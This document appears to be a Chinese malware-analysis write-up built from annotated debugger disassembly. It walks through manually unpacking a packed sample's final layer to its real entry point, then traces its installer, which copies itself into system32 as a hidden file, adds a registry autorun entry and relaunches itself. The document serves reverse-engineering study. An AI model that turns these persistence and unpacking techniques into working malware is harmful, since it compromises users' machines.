00401F4A FF15 F2914100 CALL DWORD PTR DS:[4191F2]             ; GDI32.GetObjectType
00401F50 81D2 E1473A10 ADC EDX,103A47E1
00401F56 C1C1 02       ROL ECX,2
00401F59 C1D2 01       RCL EDX,1
00401F5C 3BC8          CMP ECX,EAX
00401F5E 76 07          JBE SHORT misfotos.00401F67
00401F60 BA 4E40CC04    MOV EDX,4CC404E
00401F65 23C8          AND ECX,EAX
00401F67 1915 40FE4000 SBB DWORD PTR DS:[40FE40],EDX
00401F6D 81D1 B9200B37 ADC ECX,370B20B9
00401F73 C1DA 10       RCR EDX,10
00401F76 68 64000000    PUSH 64
00401F7B 68 DC000000    PUSH 0DC
00401F80 FF15 A2914100 CALL DWORD PTR DS:[4191A2]             ; GDI32.GetMetaRgn
00401F86 81C9 196ABB10 OR ECX,10BB6A19
00401F8C 0B05 50F94000 OR EAX,DWORD PTR DS:[40F950]
00401F92 81E2 C985C27A AND EDX,7AC285C9
00401F98 68 5A000000    PUSH 5A
00401F9D FF15 CE914100 CALL DWORD PTR DS:[4191CE]             ; GDI32.GetTextColor
00401FA3 C1F9 06       SAR ECX,6
00401FA6 C1F0 0F       SAL EAX,0F
00401FA9 B9 A58554AF    MOV ECX,AF5485A5
00401FAE E9 0C000000    JMP misfotos.00401FBF
00401FB3 3305 D0FE4000 XOR EAX,DWORD PTR DS:[40FED0]
00401FB9 2315 00FB4000 AND EDX,DWORD PTR DS:[40FB00]
00401FBF C3             RETN
----------------------------------------------------------------------------------------------------
第三层：压缩壳

003C0000 55             PUSH EBP                               ; 第三层压缩壳入口处.[F8]向下走.
003C0001 8BEC          MOV EBP,ESP
003C0003 81EC 90000000 SUB ESP,90
003C0009 E8 00000000    CALL 003C000E                         ; [F7]步入.
003C000E 58             POP EAX                               ; 步入后来到这里,继续[F8]向下走.
003C000F 8BF0          MOV ESI,EAX
003C0011 2D 2B144000    SUB EAX,40142B
003C0016 8945 A0       MOV DWORD PTR SS:[EBP-60],EAX
003C0019 81E6 00F0FFFF AND ESI,FFFFF000
003C001F 8975 B0       MOV DWORD PTR SS:[EBP-50],ESI
003C0022 8B75 04       MOV ESI,DWORD PTR SS:[EBP+4]
003C0025 81E6 00F0FFFF AND ESI,FFFFF000
003C002B 66:813E 4D5A CMP WORD PTR DS:[ESI],5A4D
003C0030 74 08          JE SHORT 003C003A
003C0032 81EE 00100000 SUB ESI,1000
003C0038  ^ EB F1          JMP SHORT 003C002B                      ; 这里的循环回跳不要跳.
003C003A 8B46 3C       MOV EAX,DWORD PTR DS:[ESI+3C]          ; 我们[F4]执行到这里,继续[F8]向下走.
003C003D 3D 00200000    CMP EAX,2000
003C0042  ^ 77 EE          JA SHORT 003C0032
003C0044 03C6          ADD EAX,ESI
003C0046 8138 50450000 CMP DWORD PTR DS:[EAX],4550
003C004C  ^ 75 E4          JNZ SHORT 003C0032
003C004E 8975 C8       MOV DWORD PTR SS:[EBP-38],ESI
003C0051 8B46 3C       MOV EAX,DWORD PTR DS:[ESI+3C]
003C0054 0345 C8       ADD EAX,DWORD PTR SS:[EBP-38]
003C0057 8B48 28       MOV ECX,DWORD PTR DS:[EAX+28]
003C005A 034D C8       ADD ECX,DWORD PTR SS:[EBP-38]
003C005D 894D AC       MOV DWORD PTR SS:[EBP-54],ECX
003C0060 64:A1 30000000  MOV EAX,DWORD PTR FS:[30]
003C0066 8B40 0C       MOV EAX,DWORD PTR DS:[EAX+C]
003C0069 8B40 1C       MOV EAX,DWORD PTR DS:[EAX+1C]
003C006C 8B00          MOV EAX,DWORD PTR DS:[EAX]
003C006E 8B40 08       MOV EAX,DWORD PTR DS:[EAX+8]
003C0071 8945 F8       MOV DWORD PTR SS:[EBP-8],EAX
003C0074 B8 44332211    MOV EAX,11223344
003C0079 B8 44332211    MOV EAX,11223344
003C007E 68 00700000    PUSH 7000
003C0083 68 7BD1486C    PUSH 6C48D17B
003C0088 68 691EAD0F    PUSH 0FAD1E69
003C008D 68 00880000    PUSH 8800
003C0092 8F45 80       POP DWORD PTR SS:[EBP-80]
003C0095 8F85 70FFFFFF POP DWORD PTR SS:[EBP-90]
003C009B 8F45 94       POP DWORD PTR SS:[EBP-6C]
003C009E 8F45 9C       POP DWORD PTR SS:[EBP-64]
003C00A1 8D35 8D184000 LEA ESI,DWORD PTR DS:[40188D]
003C00A7 0375 A0       ADD ESI,DWORD PTR SS:[EBP-60]
003C00AA 8D7D D8       LEA EDI,DWORD PTR SS:[EBP-28]
003C00AD 56             PUSH ESI
003C00AE 56             PUSH ESI
003C00AF FF75 F8       PUSH DWORD PTR SS:[EBP-8]
003C00B2 E8 22030000    CALL 003C03D9                         ; 这个CALL可以直接[F8]步过.
003C00B7 AB             STOS DWORD PTR ES:[EDI]
003C00B8 5E             POP ESI
003C00B9 46             INC ESI
003C00BA 807E FF 00    CMP BYTE PTR DS:[ESI-1],0
003C00BE  ^ 75 F9          JNZ SHORT 003C00B9                      ; 这里的循环回跳不要跳.
003C00C0 803E AB       CMP BYTE PTR DS:[ESI],0AB             ; 我们[F4]执行到这里,继续[F8]向下走.
003C00C3  ^ 75 E8          JNZ SHORT 003C00AD                      ; 这里的循环回跳不要跳.
003C00C5 8B5D 94       MOV EBX,DWORD PTR SS:[EBP-6C]          ; 我们[F4]执行到这里,继续[F8]向下走.
003C00C8 8B95 70FFFFFF MOV EDX,DWORD PTR SS:[EBP-90]
003C00CE 8B4D 80       MOV ECX,DWORD PTR SS:[EBP-80]
003C00D1 60             PUSHAD
003C00D2 6A 40          PUSH 40
003C00D4 68 00100000    PUSH 1000
003C00D9 51             PUSH ECX
003C00DA 6A 00          PUSH 0
003C00DC FF55 E8       CALL DWORD PTR SS:[EBP-18]
003C00DF 8945 90       MOV DWORD PTR SS:[EBP-70],EAX
003C00E2 0BC0          OR EAX,EAX
003C00E4 61             POPAD
003C00E5 0F84 D8020000 JE 003C03C3
003C00EB C1E9 02       SHR ECX,2
003C00EE 8B75 9C       MOV ESI,DWORD PTR SS:[EBP-64]
003C00F1 0375 C8       ADD ESI,DWORD PTR SS:[EBP-38]
003C00F4 8B7D 90       MOV EDI,DWORD PTR SS:[EBP-70]
003C00F7 AD             LODS DWORD PTR DS:[ESI]
003C00F8 2BC2          SUB EAX,EDX
003C00FA 33C3          XOR EAX,EBX
003C00FC AB             STOS DWORD PTR ES:[EDI]
003C00FD  ^ E2 F8          LOOPD SHORT 003C00F7                   ; 这里的循环回跳不要跳.
003C00FF 8B45 90       MOV EAX,DWORD PTR SS:[EBP-70]          ; 我们[F4]执行到这里,继续[F8]向下走.
003C0102 8B58 3C       MOV EBX,DWORD PTR DS:[EAX+3C]
003C0105 035D 90       ADD EBX,DWORD PTR SS:[EBP-70]
003C0108 895D B4       MOV DWORD PTR SS:[EBP-4C],EBX
003C010B 8D83 F8000000 LEA EAX,DWORD PTR DS:[EBX+F8]
003C0111 8945 BC       MOV DWORD PTR SS:[EBP-44],EAX
003C0114 0FB743 06    MOVZX EAX,WORD PTR DS:[EBX+6]
003C0118 8945 A4       MOV DWORD PTR SS:[EBP-5C],EAX
003C011B 8B43 28       MOV EAX,DWORD PTR DS:[EBX+28]
003C011E 8985 78FFFFFF MOV DWORD PTR SS:[EBP-88],EAX
003C0124 8B83 80000000 MOV EAX,DWORD PTR DS:[EBX+80]
003C012A 8945 98       MOV DWORD PTR SS:[EBP-68],EAX
003C012D 8B43 50       MOV EAX,DWORD PTR DS:[EBX+50]
003C0130 8985 74FFFFFF MOV DWORD PTR SS:[EBP-8C],EAX
003C0136 8B45 90       MOV EAX,DWORD PTR SS:[EBP-70]
003C0139 8B58 3C       MOV EBX,DWORD PTR DS:[EAX+3C]
003C013C 035D C8       ADD EBX,DWORD PTR SS:[EBP-38]
003C013F 895D C4       MOV DWORD PTR SS:[EBP-3C],EBX
003C0142 81C3 F8000000 ADD EBX,0F8
003C0148 895D BC       MOV DWORD PTR SS:[EBP-44],EBX
003C014B 8D45 D0       LEA EAX,DWORD PTR SS:[EBP-30]
003C014E 50             PUSH EAX
003C014F 6A 40          PUSH 40
003C0151 FFB5 74FFFFFF PUSH DWORD PTR SS:[EBP-8C]
003C0157 FF75 C8       PUSH DWORD PTR SS:[EBP-38]
003C015A FF55 E4       CALL DWORD PTR SS:[EBP-1C]
003C015D 0BC0          OR EAX,EAX
003C015F 0F84 5E020000 JE 003C03C3
003C0165 8B8D 74FFFFFF MOV ECX,DWORD PTR SS:[EBP-8C]
003C016B C1E9 02       SHR ECX,2
003C016E 33C0          XOR EAX,EAX
003C0170 8B7D C8       MOV EDI,DWORD PTR SS:[EBP-38]
003C0173 F3:AB          REP STOS DWORD PTR ES:[EDI]
003C0175 B9 00100000    MOV ECX,1000
003C017A 8B75 90       MOV ESI,DWORD PTR SS:[EBP-70]
003C017D 8B7D C8       MOV EDI,DWORD PTR SS:[EBP-38]
003C0180 E8 23020000    CALL 003C03A8                         ; 这个CALL可以直接[F8]步过.
003C0185 8B55 A4       MOV EDX,DWORD PTR SS:[EBP-5C]
003C0188 8B5D B4       MOV EBX,DWORD PTR SS:[EBP-4C]
003C018B 81C3 F8000000 ADD EBX,0F8
003C0191 8B75 90       MOV ESI,DWORD PTR SS:[EBP-70]
003C0194 0373 14       ADD ESI,DWORD PTR DS:[EBX+14]
003C0197 8B7D C8       MOV EDI,DWORD PTR SS:[EBP-38]
003C019A 037B 0C       ADD EDI,DWORD PTR DS:[EBX+C]
003C019D 8B4B 10       MOV ECX,DWORD PTR DS:[EBX+10]
003C01A0 E8 03020000    CALL 003C03A8                         ; 这个CALL可以直接[F8]步过.
003C01A5 83C3 28       ADD EBX,28
003C01A8 4A             DEC EDX
003C01A9  ^ 75 E6          JNZ SHORT 003C0191                      ; 这里的循环回跳不要跳.
003C01AB 68 00800000    PUSH 8000                               ; 我们[F4]执行到这里,继续[F8]向下走.
003C01B0 6A 00          PUSH 0
003C01B2 FF75 90       PUSH DWORD PTR SS:[EBP-70]
003C01B5 FF55 EC       CALL DWORD PTR SS:[EBP-14]
003C01B8 8B5D C4       MOV EBX,DWORD PTR SS:[EBP-3C]
003C01BB 8B83 80000000 MOV EAX,DWORD PTR DS:[EBX+80]
003C01C1 0BC0          OR EAX,EAX
003C01C3 0F84 9B000000 JE 003C0264
003C01C9 0345 C8       ADD EAX,DWORD PTR SS:[EBP-38]
003C01CC 8945 FC       MOV DWORD PTR SS:[EBP-4],EAX
003C01CF C745 B8 0000000>MOV DWORD PTR SS:[EBP-48],0
003C01D6 8B5D FC       MOV EBX,DWORD PTR SS:[EBP-4]
003C01D9 8B43 0C       MOV EAX,DWORD PTR DS:[EBX+C]
003C01DC 0BC0          OR EAX,EAX
003C01DE 0F84 80000000 JE 003C0264
003C01E4 0345 C8       ADD EAX,DWORD PTR SS:[EBP-38]
003C01E7 50             PUSH EAX
003C01E8 50             PUSH EAX
003C01E9 FF55 DC       CALL DWORD PTR SS:[EBP-24]
003C01EC 0BC0          OR EAX,EAX
003C01EE 59             POP ECX
003C01EF 75 04          JNZ SHORT 003C01F5
003C01F1 51             PUSH ECX
003C01F2 FF55 E0       CALL DWORD PTR SS:[EBP-20]
003C01F5 8945 C0       MOV DWORD PTR SS:[EBP-40],EAX
003C01F8 8B5D FC       MOV EBX,DWORD PTR SS:[EBP-4]
003C01FB 8B43 10       MOV EAX,DWORD PTR DS:[EBX+10]
003C01FE 0345 C8       ADD EAX,DWORD PTR SS:[EBP-38]
003C0201 8945 A8       MOV DWORD PTR SS:[EBP-58],EAX
003C0204 8B03          MOV EAX,DWORD PTR DS:[EBX]
003C0206 0BC0          OR EAX,EAX
003C0208 75 14          JNZ SHORT 003C021E
003C020A 8B45 A8       MOV EAX,DWORD PTR SS:[EBP-58]
003C020D 2B45 C8       SUB EAX,DWORD PTR SS:[EBP-38]
003C0210 3D FFFFAF00    CMP EAX,0AFFFFF
003C0215 77 44          JA SHORT 003C025B
003C0217 3D 00100000    CMP EAX,1000
003C021C 72 3D          JB SHORT 003C025B
003C021E 0345 C8       ADD EAX,DWORD PTR SS:[EBP-38]
003C0221 8945 D4       MOV DWORD PTR SS:[EBP-2C],EAX
003C0224 8B75 D4       MOV ESI,DWORD PTR SS:[EBP-2C]
003C0227 0375 B8       ADD ESI,DWORD PTR SS:[EBP-48]
003C022A 8B36          MOV ESI,DWORD PTR DS:[ESI]
003C022C 0BF6          OR ESI,ESI
003C022E 74 2B          JE SHORT 003C025B
003C0230 8BC6          MOV EAX,ESI
003C0232 25 00000080    AND EAX,80000000
003C0237 74 08          JE SHORT 003C0241
003C0239 81E6 FFFFFF4F AND ESI,4FFFFFFF
003C023F EB 06          JMP SHORT 003C0247
003C0241 0375 C8       ADD ESI,DWORD PTR SS:[EBP-38]
003C0244 83C6 02       ADD ESI,2
003C0247 56             PUSH ESI
003C0248 FF75 C0       PUSH DWORD PTR SS:[EBP-40]
003C024B FF55 D8       CALL DWORD PTR SS:[EBP-28]
003C024E 8B7D B8       MOV EDI,DWORD PTR SS:[EBP-48]
003C0251 037D A8       ADD EDI,DWORD PTR SS:[EBP-58]
003C0254 AB             STOS DWORD PTR ES:[EDI]
003C0255 8345 B8 04    ADD DWORD PTR SS:[EBP-48],4
003C0259  ^ EB C9          JMP SHORT 003C0224                      ; 这里的循环回跳不要跳.
003C025B 8345 FC 14    ADD DWORD PTR SS:[EBP-4],14             ; 我们[F4]执行到这里,继续[F8]向下走.
003C025F  ^ E9 6BFFFFFF    JMP 003C01CF                            ; 这里的循环回跳不要跳.
003C0264 8B45 C4       MOV EAX,DWORD PTR SS:[EBP-3C]          ; 我们[F4]执行到这里,继续[F8]向下走.
003C0267 8B70 34       MOV ESI,DWORD PTR DS:[EAX+34]
003C026A 8975 88       MOV DWORD PTR SS:[EBP-78],ESI
003C026D 8BB0 A0000000 MOV ESI,DWORD PTR DS:[EAX+A0]
003C0273 0BF6          OR ESI,ESI
003C0275 74 47          JE SHORT 003C02BE
003C0277 FFB0 A4000000 PUSH DWORD PTR DS:[EAX+A4]
003C027D 8F45 CC       POP DWORD PTR SS:[EBP-34]
003C0280 0375 C8       ADD ESI,DWORD PTR SS:[EBP-38]
003C0283 8B5D C8       MOV EBX,DWORD PTR SS:[EBP-38]
003C0286 2B5D 88       SUB EBX,DWORD PTR SS:[EBP-78]
003C0289 AD             LODS DWORD PTR DS:[ESI]
003C028A 8BF8          MOV EDI,EAX
003C028C AD             LODS DWORD PTR DS:[ESI]
003C028D 8BC8          MOV ECX,EAX
003C028F 83F8 08       CMP EAX,8
003C0292 7E 2A          JLE SHORT 003C02BE
003C0294 294D CC       SUB DWORD PTR SS:[EBP-34],ECX
003C0297 83E9 08       SUB ECX,8
003C029A D1E9          SHR ECX,1
003C029C 33C0          XOR EAX,EAX
003C029E 66:AD          LODS WORD PTR DS:[ESI]
003C02A0 8BD0          MOV EDX,EAX
003C02A2 C1EA 0C       SHR EDX,0C
003C02A5 83FA 03       CMP EDX,3
003C02A8 75 0C          JNZ SHORT 003C02B6
003C02AA 25 FF0F0000    AND EAX,0FFF
003C02AF 0345 C8       ADD EAX,DWORD PTR SS:[EBP-38]
003C02B2 03C7          ADD EAX,EDI
003C02B4 0118          ADD DWORD PTR DS:[EAX],EBX
003C02B6  ^ E2 E4          LOOPD SHORT 003C029C
003C02B8 837D CC 00    CMP DWORD PTR SS:[EBP-34],0
003C02BC  ^ 7F CB          JG SHORT 003C0289
003C02BE 8B45 C8       MOV EAX,DWORD PTR SS:[EBP-38]
003C02C1 0185 78FFFFFF ADD DWORD PTR SS:[EBP-88],EAX
003C02C7 8B45 C8       MOV EAX,DWORD PTR SS:[EBP-38]
003C02CA 3B85 78FFFFFF CMP EAX,DWORD PTR SS:[EBP-88]
003C02D0 75 0A          JNZ SHORT 003C02DC
003C02D2 C785 78FFFFFF 0>MOV DWORD PTR SS:[EBP-88],0
003C02DC 8B4D C8       MOV ECX,DWORD PTR SS:[EBP-38]
003C02DF 64:A1 18000000  MOV EAX,DWORD PTR FS:[18]
003C02E5 8B40 30       MOV EAX,DWORD PTR DS:[EAX+30]
003C02E8 8B70 08       MOV ESI,DWORD PTR DS:[EAX+8]
003C02EB 3B75 C8       CMP ESI,DWORD PTR SS:[EBP-38]
003C02EE 74 1E          JE SHORT 003C030E
003C02F0 8B40 0C       MOV EAX,DWORD PTR DS:[EAX+C]
003C02F3 8B40 1C       MOV EAX,DWORD PTR DS:[EAX+1C]
003C02F6 BA 00100000    MOV EDX,1000
003C02FB 4A             DEC EDX
003C02FC 74 10          JE SHORT 003C030E
003C02FE 8B00          MOV EAX,DWORD PTR DS:[EAX]
003C0300 3B48 08       CMP ECX,DWORD PTR DS:[EAX+8]
003C0303  ^ 75 F6          JNZ SHORT 003C02FB
003C0305 8BB5 78FFFFFF MOV ESI,DWORD PTR SS:[EBP-88]
003C030B 8970 0C       MOV DWORD PTR DS:[EAX+C],ESI
003C030E 8D45 D0       LEA EAX,DWORD PTR SS:[EBP-30]
003C0311 50             PUSH EAX
003C0312 6A 20          PUSH 20
003C0314 FFB5 74FFFFFF PUSH DWORD PTR SS:[EBP-8C]
003C031A FF75 C8       PUSH DWORD PTR SS:[EBP-38]
003C031D FF55 E4       CALL DWORD PTR SS:[EBP-1C]
003C0320 8B75 C4       MOV ESI,DWORD PTR SS:[EBP-3C]
003C0323 0FB74E 06    MOVZX ECX,WORD PTR DS:[ESI+6]
003C0327 81C6 F8000000 ADD ESI,0F8
003C032D 60             PUSHAD
003C032E 8B46 24       MOV EAX,DWORD PTR DS:[ESI+24]
003C0331 25 00000080    AND EAX,80000000
003C0336 74 13          JE SHORT 003C034B
003C0338 8D45 D0       LEA EAX,DWORD PTR SS:[EBP-30]
003C033B 50             PUSH EAX
003C033C 6A 40          PUSH 40
003C033E FF76 08       PUSH DWORD PTR DS:[ESI+8]
003C0341 8B46 0C       MOV EAX,DWORD PTR DS:[ESI+C]
003C0344 0345 C8       ADD EAX,DWORD PTR SS:[EBP-38]
003C0347 50             PUSH EAX
003C0348 FF55 E4       CALL DWORD PTR SS:[EBP-1C]
003C034B 61             POPAD
003C034C 83C6 28       ADD ESI,28
003C034F  ^ E2 DC          LOOPD SHORT 003C032D                   ; 这里的循环回跳不要跳.
003C0351 83BD 78FFFFFF 0>CMP DWORD PTR SS:[EBP-88],0             ; 我们[F4]执行到这里,继续[F8]向下走.
003C0358 75 26          JNZ SHORT 003C0380
003C035A 8BE5          MOV ESP,EBP
003C035C 5D             POP EBP
003C035D 83C4 04       ADD ESP,4
003C0360 8B4C24 18    MOV ECX,DWORD PTR SS:[ESP+18]
003C0364 8B5424 14    MOV EDX,DWORD PTR SS:[ESP+14]
003C0368 8B5C24 10    MOV EBX,DWORD PTR SS:[ESP+10]
003C036C 8B6C24 08    MOV EBP,DWORD PTR SS:[ESP+8]
003C0370 8B7424 04    MOV ESI,DWORD PTR SS:[ESP+4]
003C0374 8B3C24       MOV EDI,DWORD PTR SS:[ESP]
003C0377 83C4 20       ADD ESP,20
003C037A B8 01000000    MOV EAX,1
003C037F C3             RETN
003C0380 8B85 78FFFFFF MOV EAX,DWORD PTR SS:[EBP-88]
003C0386 8BE5          MOV ESP,EBP
003C0388 5D             POP EBP
003C0389 83C4 04       ADD ESP,4
003C038C 8B4C24 18    MOV ECX,DWORD PTR SS:[ESP+18]
003C0390 8B5424 14    MOV EDX,DWORD PTR SS:[ESP+14]
003C0394 8B5C24 10    MOV EBX,DWORD PTR SS:[ESP+10]
003C0398 8B6C24 08    MOV EBP,DWORD PTR SS:[ESP+8]
003C039C 8B7424 04    MOV ESI,DWORD PTR SS:[ESP+4]
003C03A0 8B3C24       MOV EDI,DWORD PTR SS:[ESP]
003C03A3 83C4 20       ADD ESP,20
003C03A6  - FFE0          JMP EAX                               ; 这里是关键跳转,它会跳向下一个OEP入口处.
003C03A8 52             PUSH EDX
003C03A9 8BD1          MOV EDX,ECX
003C03AB C1E9 02       SHR ECX,2
003C03AE 83E2 03       AND EDX,3
003C03B1 0BC9          OR ECX,ECX
003C03B3 74 02          JE SHORT 003C03B7
003C03B5 F3:A5          REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS>
003C03B7 03CA          ADD ECX,EDX
003C03B9 0BC9          OR ECX,ECX
003C03BB 74 04          JE SHORT 003C03C1
003C03BD 8BCA          MOV ECX,EDX
003C03BF F3:A4          REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[>
003C03C1 5A             POP EDX
003C03C2 C3             RETN
----------------------------------------------------------------------------------------------------
手脱完毕,程序的真实入口：

00402B96 55             PUSH EBP                               ; 这里是脱壳后的真实入口,在这里就可以DUMP了(输入表没有被破坏,脱壳保存后样本可以正常运行).
00402B97 8BEC          MOV EBP,ESP
00402B99 81EC E4070000 SUB ESP,7E4
00402B9F 6A 01          PUSH 1
00402BA1 FF15 A0804000 CALL DWORD PTR DS:[4080A0]             ; kernel32.SetErrorMode
00402BA7 68 04010000    PUSH 104
00402BAC 6A 00          PUSH 0
00402BAE 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104]
00402BB4 50             PUSH EAX
00402BB5 E8 80440000    CALL misfotos.0040703A                ; JMP 到 msvcrt.memset
00402BBA 83C4 0C       ADD ESP,0C
00402BBD 68 04010000    PUSH 104
00402BC2 6A 00          PUSH 0
00402BC4 8D85 ACF8FFFF LEA EAX,DWORD PTR SS:[EBP-754]
00402BCA 50             PUSH EAX
00402BCB E8 6A440000    CALL misfotos.0040703A                ; JMP 到 msvcrt.memset
00402BD0 83C4 0C       ADD ESP,0C
00402BD3 68 04010000    PUSH 104
00402BD8 6A 00          PUSH 0
00402BDA 8D85 B4F9FFFF LEA EAX,DWORD PTR SS:[EBP-64C]
00402BE0 50             PUSH EAX
00402BE1 E8 54440000    CALL misfotos.0040703A                ; JMP 到 msvcrt.memset
00402BE6 83C4 0C       ADD ESP,0C
00402BE9 68 04010000    PUSH 104
00402BEE 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104]
00402BF4 50             PUSH EAX
00402BF5 6A 00          PUSH 0
00402BF7 FF15 9C804000 CALL DWORD PTR DS:[40809C]             ; kernel32.GetModuleHandleA
00402BFD 50             PUSH EAX
00402BFE FF15 98804000 CALL DWORD PTR DS:[408098]             ; kernel32.GetModuleFileNameA
00402C04 68 04010000    PUSH 104
00402C09 8D85 B4F9FFFF LEA EAX,DWORD PTR SS:[EBP-64C]
00402C0F 50             PUSH EAX
00402C10 FF15 94804000 CALL DWORD PTR DS:[408094]             ; kernel32.GetSystemDirectoryA
----------------------------------------------------------------------------------------------------
****************************************************************************************************
二、样本分析部分：

----------------------------------------------------------------------------------------------------
1、当样本执行安装功能时的分析：

00402B96 55             PUSH EBP                               ; 程序入口.
00402B97 8BEC          MOV EBP,ESP
00402B99 81EC E4070000 SUB ESP,7E4
00402B9F 6A 01          PUSH 1                                  ; ErrorMode = SEM_FAILCRITICALERRORS
00402BA1 FF15 A0804000 CALL DWORD PTR DS:[4080A0]             ; kernel32.SetErrorMode
00402BA7 68 04010000    PUSH 104
00402BAC 6A 00          PUSH 0
00402BAE 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104]
00402BB4 50             PUSH EAX
00402BB5 E8 80440000    CALL misfotos.0040703A                ; JMP 到 msvcrt.memset
00402BBA 83C4 0C       ADD ESP,0C
00402BBD 68 04010000    PUSH 104
00402BC2 6A 00          PUSH 0
00402BC4 8D85 ACF8FFFF LEA EAX,DWORD PTR SS:[EBP-754]
00402BCA 50             PUSH EAX
00402BCB E8 6A440000    CALL misfotos.0040703A                ; JMP 到 msvcrt.memset
00402BD0 83C4 0C       ADD ESP,0C
00402BD3 68 04010000    PUSH 104
00402BD8 6A 00          PUSH 0
00402BDA 8D85 B4F9FFFF LEA EAX,DWORD PTR SS:[EBP-64C]
00402BE0 50             PUSH EAX
00402BE1 E8 54440000    CALL misfotos.0040703A                ; JMP 到 msvcrt.memset
00402BE6 83C4 0C       ADD ESP,0C
00402BE9 68 04010000    PUSH 104
00402BEE 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104]
00402BF4 50             PUSH EAX
00402BF5 6A 00          PUSH 0
00402BF7 FF15 9C804000 CALL DWORD PTR DS:[40809C]             ; kernel32.GetModuleHandleA
00402BFD 50             PUSH EAX
00402BFE FF15 98804000 CALL DWORD PTR DS:[408098]             ; kernel32.GetModuleFileNameA(获取程序自身当前路径名).
00402C04 68 04010000    PUSH 104
00402C09 8D85 B4F9FFFF LEA EAX,DWORD PTR SS:[EBP-64C]
00402C0F 50             PUSH EAX
00402C10 FF15 94804000 CALL DWORD PTR DS:[408094]             ; kernel32.GetSystemDirectoryA(获取系统SYSTEM32文件夹路径名).
00402C16 68 1BD7A201    PUSH 1A2D71B
00402C1B 8D8D 8CF8FFFF LEA ECX,DWORD PTR SS:[EBP-774]
00402C21 E8 4A040000    CALL misfotos.00403070                ; ASCII "waccs.exe"
00402C26 50             PUSH EAX
00402C27 8D85 B4F9FFFF LEA EAX,DWORD PTR SS:[EBP-64C]
00402C2D 50             PUSH EAX
00402C2E 68 C9276909    PUSH 96927C9
00402C33 8D8D 84F8FFFF LEA ECX,DWORD PTR SS:[EBP-77C]
00402C39 E8 D2030000    CALL misfotos.00403010                ; ASCII "%s\%s"
00402C3E 50             PUSH EAX
00402C3F 68 04010000    PUSH 104
00402C44 8D85 ACF8FFFF LEA EAX,DWORD PTR SS:[EBP-754]
00402C4A 50             PUSH EAX
00402C4B E8 F0430000    CALL misfotos.00407040                ; JMP 到 msvcrt._snprintf(ASCII "C:\WINDOWS\system32\waccs.exe").
00402C50 83C4 14       ADD ESP,14
00402C53 8D8D 84F8FFFF LEA ECX,DWORD PTR SS:[EBP-77C]
00402C59 E8 28F3FFFF    CALL misfotos.00401F86                ; 清除内存数据.
00402C5E 8D8D 8CF8FFFF LEA ECX,DWORD PTR SS:[EBP-774]
00402C64 E8 85F4FFFF    CALL misfotos.004020EE                ; 清除内存数据.
00402C69 68 2FD7A201    PUSH 1A2D72F
00402C6E 8D8D 78F8FFFF LEA ECX,DWORD PTR SS:[EBP-788]
00402C74 E8 F7030000    CALL misfotos.00403070                ; ASCII "waccs.exe"
00402C79 50             PUSH EAX
00402C7A E8 F1140000    CALL misfotos.00404170                ; 在注册表中添加病毒启动项.
00402C7F 59             POP ECX
00402C80 8D8D 78F8FFFF LEA ECX,DWORD PTR SS:[EBP-788]
00402C86 E8 63F4FFFF    CALL misfotos.004020EE                ; 清除内存数据.
00402C8B 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104]
00402C91 50             PUSH EAX                               ; /s2 = "C:\Documents and Settings\Coderui\桌面\virus.exe"
00402C92 8D85 ACF8FFFF LEA EAX,DWORD PTR SS:[EBP-754]
00402C98 50             PUSH EAX                               ; |s1 = "C:\WINDOWS\system32\waccs.exe"
00402C99 E8 04440000    CALL misfotos.004070A2                ; JMP 到 msvcrt.strcmp(字符串比较)
00402C9E 59             POP ECX
00402C9F 59             POP ECX
00402CA0 85C0          TEST EAX,EAX                            ; 判断比较结果.
00402CA2 74 70          JE SHORT misfotos.00402D14             ; 如果s2 != s1,则该病毒程序执行安装(安装功能)操作;如果s2 == s1,则该病毒程序执行恶意(主要功能)操作.
00402CA4 83A5 A8F8FFFF 0>AND DWORD PTR SS:[EBP-758],0          ; 如果s2 != s1,则该病毒程序从这里开始执行安装操作.
00402CAB EB 0D          JMP SHORT misfotos.00402CBA
00402CAD 8B85 A8F8FFFF MOV EAX,DWORD PTR SS:[EBP-758]
00402CB3 40             INC EAX
00402CB4 8985 A8F8FFFF MOV DWORD PTR SS:[EBP-758],EAX
00402CBA 83BD A8F8FFFF 0>CMP DWORD PTR SS:[EBP-758],5
00402CC1 7D 1E          JGE SHORT misfotos.00402CE1
00402CC3 6A 00          PUSH 0                                  ; /FailIfExists = FALSE
00402CC5 8D85 ACF8FFFF LEA EAX,DWORD PTR SS:[EBP-754]
00402CCB 50             PUSH EAX                               ; |NewFileName = "C:\WINDOWS\system32\waccs.exe"
00402CCC 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104]
00402CD2 50             PUSH EAX                               ; |s2 = "C:\Documents and Settings\Coderui\桌面\virus.exe"
00402CD3 FF15 90804000 CALL DWORD PTR DS:[408090]             ; kernel32.CopyFileA
00402CD9 85C0          TEST EAX,EAX                            ; 判断执行的结果.
00402CDB 74 02          JE SHORT misfotos.00402CDF             ; 如果文件拷贝成功,则不执行跳转功能;如果文件拷贝失败,则跳到"00402CDF"地址处.
00402CDD EB 02          JMP SHORT misfotos.00402CE1             ; 文件拷贝成功,跳到"00402CE1"地址处继续执行后面的操作.
00402CDF  ^ EB CC          JMP SHORT misfotos.00402CAD             ; 跳回去重新执行文件拷贝操作代码.
00402CE1 6A 07          PUSH 7
00402CE3 8D85 ACF8FFFF LEA EAX,DWORD PTR SS:[EBP-754]          ; /FileAttributes = READONLY|HIDDEN|SYSTEM
00402CE9 50             PUSH EAX                               ; |FileName = "C:\WINDOWS\system32\waccs.exe"
00402CEA FF15 8C804000 CALL DWORD PTR DS:[40808C]             ; kernel32.SetFileAttributesA(设置文件属性为：只读、系统、隐藏).
00402CF0 6A 00          PUSH 0
00402CF2 6A 00          PUSH 0
00402CF4 6A 00          PUSH 0
00402CF6 8D85 ACF8FFFF LEA EAX,DWORD PTR SS:[EBP-754]
00402CFC 50             PUSH EAX                               ; FileName = "C:\WINDOWS\system32\waccs.exe"
00402CFD 68 C4914000    PUSH misfotos.004091C4                ; ASCII "open"
00402D02 6A 00          PUSH 0
00402D04 FF15 74814000 CALL DWORD PTR DS:[408174]             ; SHELL32.ShellExecuteA(调用运行拷贝后的病毒程序"waccs.exe").
